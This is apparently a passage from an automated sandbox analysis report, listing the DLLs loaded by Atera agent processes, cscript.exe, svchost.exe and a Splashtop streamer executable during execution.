                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: dhcpcsvc6.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: dhcpcsvc.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: dnsapi.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: winnsi.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: rasadhlp.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: fwpuclnt.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: secur32.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: sspicli.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: schannel.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: mskeyprotect.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: ntasn1.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: ncrypt.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: ncryptsslp.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: msasn1.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: gpapi.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: mscoree.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: kernel.appcore.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: version.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: vcruntime140_clr0400.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: ucrtbase_clr0400.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: ucrtbase_clr0400.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: cryptsp.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: rsaenh.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: cryptbase.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: windows.storage.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: wldp.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: profapi.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: mscoree.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: kernel.appcore.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: version.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: vcruntime140_clr0400.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: ucrtbase_clr0400.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: ucrtbase_clr0400.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: windows.storage.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: wldp.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: profapi.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: cryptsp.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: rsaenh.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: cryptbase.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: propsys.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: edputil.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: urlmon.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: iertutil.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: srvcli.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: netutils.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: windows.staterepositoryps.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: sspicli.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: rasapi32.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: rasman.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: wintypes.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: rtutils.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: appresolver.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: bcp47langs.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: slc.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: userenv.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: sppc.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: mswsock.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: winhttp.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: onecorecommonproxystub.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: ondemandconnroutehelper.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: iphlpapi.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: onecoreuapcommonproxystub.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: dhcpcsvc6.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: dhcpcsvc.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: dnsapi.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: winnsi.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: rasadhlp.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: fwpuclnt.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: secur32.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: schannel.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: mskeyprotect.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: ntasn1.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: ncrypt.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: ncryptsslp.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: msasn1.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: gpapi.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: wbemcomn.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: amsi.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: cryptnet.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: apphelp.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: webio.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: mscoree.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: kernel.appcore.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: version.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: vcruntime140_clr0400.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: ucrtbase_clr0400.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: ucrtbase_clr0400.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: cryptsp.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: rsaenh.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: cryptbase.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: windows.storage.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: wldp.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: profapi.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: wbemcomn.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: amsi.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: userenv.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: wscapi.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: urlmon.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: iertutil.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: srvcli.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: netutils.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: sspicli.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: mswsock.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: iphlpapi.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: rasapi32.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: rasman.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: rtutils.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: winhttp.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: ondemandconnroutehelper.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: dhcpcsvc6.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: dhcpcsvc.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: dnsapi.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: winnsi.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe Section loaded: rasadhlp.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe Section loaded: fwpuclnt.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe Section loaded: secur32.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe Section loaded: schannel.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe Section loaded: mskeyprotect.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe Section loaded: ntasn1.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe Section loaded: ncrypt.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe Section loaded: ncryptsslp.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe Section loaded: msasn1.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe Section loaded: gpapi.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe Section loaded: wtsapi32.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe Section loaded: winsta.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe Section loaded: devobj.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe Section loaded: napinsp.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe Section loaded: pnrpnsp.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe Section loaded: wshbth.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe Section loaded: nlaapi.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe Section loaded: winrnr.dll
                                Source: C:\Windows\System32\cscript.exe Section loaded: version.dll
                                Source: C:\Windows\System32\cscript.exe Section loaded: kernel.appcore.dll
                                Source: C:\Windows\System32\cscript.exe Section loaded: sxs.dll
                                Source: C:\Windows\System32\cscript.exe Section loaded: vbscript.dll
                                Source: C:\Windows\System32\cscript.exe Section loaded: amsi.dll
                                Source: C:\Windows\System32\cscript.exe Section loaded: userenv.dll
                                Source: C:\Windows\System32\cscript.exe Section loaded: profapi.dll
                                Source: C:\Windows\System32\cscript.exe Section loaded: wldp.dll
                                Source: C:\Windows\System32\cscript.exe Section loaded: msasn1.dll
                                Source: C:\Windows\System32\cscript.exe Section loaded: cryptsp.dll
                                Source: C:\Windows\System32\cscript.exe Section loaded: rsaenh.dll
                                Source: C:\Windows\System32\cscript.exe Section loaded: cryptbase.dll
                                Source: C:\Windows\System32\cscript.exe Section loaded: msisip.dll
                                Source: C:\Windows\System32\cscript.exe Section loaded: wshext.dll
                                Source: C:\Windows\System32\cscript.exe Section loaded: scrobj.dll
                                Source: C:\Windows\System32\cscript.exe Section loaded: gpapi.dll
                                Source: C:\Windows\System32\cscript.exe Section loaded: cryptnet.dll
                                Source: C:\Windows\System32\cscript.exe Section loaded: iphlpapi.dll
                                Source: C:\Windows\System32\cscript.exe Section loaded: winnsi.dll
                                Source: C:\Windows\System32\cscript.exe Section loaded: mpr.dll
                                Source: C:\Windows\System32\cscript.exe Section loaded: scrrun.dll
                                Source: C:\Windows\System32\cscript.exe Section loaded: wbemcomn.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe Section loaded: mscoree.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe Section loaded: apphelp.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe Section loaded: kernel.appcore.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe Section loaded: version.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe Section loaded: vcruntime140_clr0400.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe Section loaded: ucrtbase_clr0400.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe Section loaded: ucrtbase_clr0400.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe Section loaded: cryptsp.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe Section loaded: rsaenh.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe Section loaded: cryptbase.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe Section loaded: windows.storage.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe Section loaded: wldp.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe Section loaded: profapi.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe Section loaded: rasapi32.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe Section loaded: rasman.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe Section loaded: rtutils.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe Section loaded: mswsock.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe Section loaded: winhttp.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe Section loaded: ondemandconnroutehelper.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe Section loaded: iphlpapi.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe Section loaded: dhcpcsvc6.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe Section loaded: dhcpcsvc.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe Section loaded: dnsapi.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe Section loaded: winnsi.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe Section loaded: rasadhlp.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe Section loaded: fwpuclnt.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe Section loaded: secur32.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe Section loaded: sspicli.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe Section loaded: schannel.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe Section loaded: mskeyprotect.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe Section loaded: ntasn1.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe Section loaded: ncrypt.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe Section loaded: ncryptsslp.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe Section loaded: msasn1.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe Section loaded: gpapi.dll
                                Source: C:\Windows\System32\svchost.exe Section loaded: smphost.dll
                                Source: C:\Windows\System32\svchost.exe Section loaded: mi.dll
                                Source: C:\Windows\System32\svchost.exe Section loaded: miutils.dll
                                Source: C:\Windows\System32\svchost.exe Section loaded: wldp.dll
                                Source: C:\Windows\System32\svchost.exe Section loaded: mispace.dll
                                Source: C:\Windows\System32\svchost.exe Section loaded: sxshared.dll
                                Source: C:\Windows\System32\svchost.exe Section loaded: sspicli.dll
                                Source: C:\Windows\System32\svchost.exe Section loaded: srvcli.dll
                                Source: C:\Windows\System32\svchost.exe Section loaded: netutils.dll
                                Source: C:\Windows\System32\svchost.exe Section loaded: wmiclnt.dll
                                Source: C:\Windows\System32\svchost.exe Section loaded: devobj.dll
                                Source: C:\Windows\System32\svchost.exe Section loaded: wevtapi.dll
                                Source: C:\Windows\System32\svchost.exe Section loaded: virtdisk.dll
                                Source: C:\Windows\System32\svchost.exe Section loaded: resutils.dll
                                Source: C:\Windows\System32\svchost.exe Section loaded: bcd.dll
                                Source: C:\Windows\System32\svchost.exe Section loaded: fltlib.dll
                                Source: C:\Windows\System32\svchost.exe Section loaded: clusapi.dll
                                Source: C:\Windows\System32\svchost.exe Section loaded: dnsapi.dll
                                Source: C:\Windows\System32\svchost.exe Section loaded: iphlpapi.dll
                                Source: C:\Windows\System32\svchost.exe Section loaded: wmidcom.dll
                                Source: C:\Windows\System32\svchost.exe Section loaded: dpapi.dll
                                Source: C:\Windows\System32\svchost.exe Section loaded: kernel.appcore.dll
                                Source: C:\Windows\System32\svchost.exe Section loaded: wmitomi.dll
                                Source: C:\Windows\System32\svchost.exe Section loaded: fastprox.dll
                                Source: C:\Windows\System32\svchost.exe Section loaded: wbemcomn.dll
                                Source: C:\Windows\System32\svchost.exe Section loaded: amsi.dll
                                Source: C:\Windows\System32\svchost.exe Section loaded: userenv.dll
                                Source: C:\Windows\System32\svchost.exe Section loaded: profapi.dll
                                Source: C:\Windows\System32\svchost.exe Section loaded: wkscli.dll
                                Source: C:\Windows\System32\svchost.exe Section loaded: cscapi.dll
                                Source: C:\Windows\System32\svchost.exe Section loaded: fmifs.dll
                                Source: C:\Windows\System32\svchost.exe Section loaded: ulib.dll
                                Source: C:\Windows\System32\svchost.exe Section loaded: ifsutil.dll
                                Source: C:\Windows\System32\svchost.exe Section loaded: healthapi.dll
                                Source: C:\Windows\System32\svchost.exe Section loaded: healthapi.dll
                                Source: C:\Windows\System32\svchost.exe Section loaded: wsp_fs.dll
                                Source: C:\Windows\System32\svchost.exe Section loaded: ntmarta.dll
                                Source: C:\Windows\System32\svchost.exe Section loaded: netapi32.dll
                                Source: C:\Windows\System32\svchost.exe Section loaded: dsrole.dll
                                Source: C:\Windows\System32\svchost.exe Section loaded: cryptsp.dll
                                Source: C:\Windows\System32\svchost.exe Section loaded: sscore.dll
                                Source: C:\Windows\System32\svchost.exe Section loaded: ntdsapi.dll
                                Source: C:\Windows\System32\svchost.exe Section loaded: logoncli.dll
                                Source: C:\Windows\System32\svchost.exe Section loaded: wsp_sr.dll
                                Source: C:\Windows\System32\svchost.exe Section loaded: tdh.dll
                                Source: C:\Windows\System32\svchost.exe Section loaded: wsp_health.dll
                                Source: C:\Windows\System32\svchost.exe Section loaded: healthapi.dll
                                Source: C:\Windows\System32\svchost.exe Section loaded: healthapi.dll
                                Source: C:\Windows\System32\svchost.exe Section loaded: healthapi.dll
                                Source: C:\Windows\System32\svchost.exe Section loaded: healthapi.dll
                                Source: C:\Windows\Temp\SplashtopStreamer.exe Section loaded: wtsapi32.dll
                                Source: C:\Windows\Temp\SplashtopStreamer.exe Section loaded: version.dll
                                Source: C:\Windows\Temp\SplashtopStreamer.exe Section loaded: wldp.dll
                                Source: C:\Windows\Temp\SplashtopStreamer.exe Section loaded: propsys.dll
                                Source: C:\Windows\Temp\SplashtopStreamer.exe Section loaded: profapi.dll
                                Source: C:\Windows\Temp\SplashtopStreamer.exe Section loaded: vaultcli.dll
                                Source: C:\Windows\Temp\SplashtopStreamer.exe Section loaded: wintypes.dll
                                Source: C:\Windows\Temp\SplashtopStreamer.exe Section loaded: edputil.dll
                                Source: C:\Windows\Temp\SplashtopStreamer.exe Section loaded: iertutil.dll
                                Source: C:\Windows\Temp\SplashtopStreamer.exe Section loaded: netutils.dll
                                Source: C:\Windows\Temp\SplashtopStreamer.exe Section loaded: srvcli.dll
                                Source: C:\Windows\Temp\SplashtopStreamer.exe Section loaded: urlmon.dll
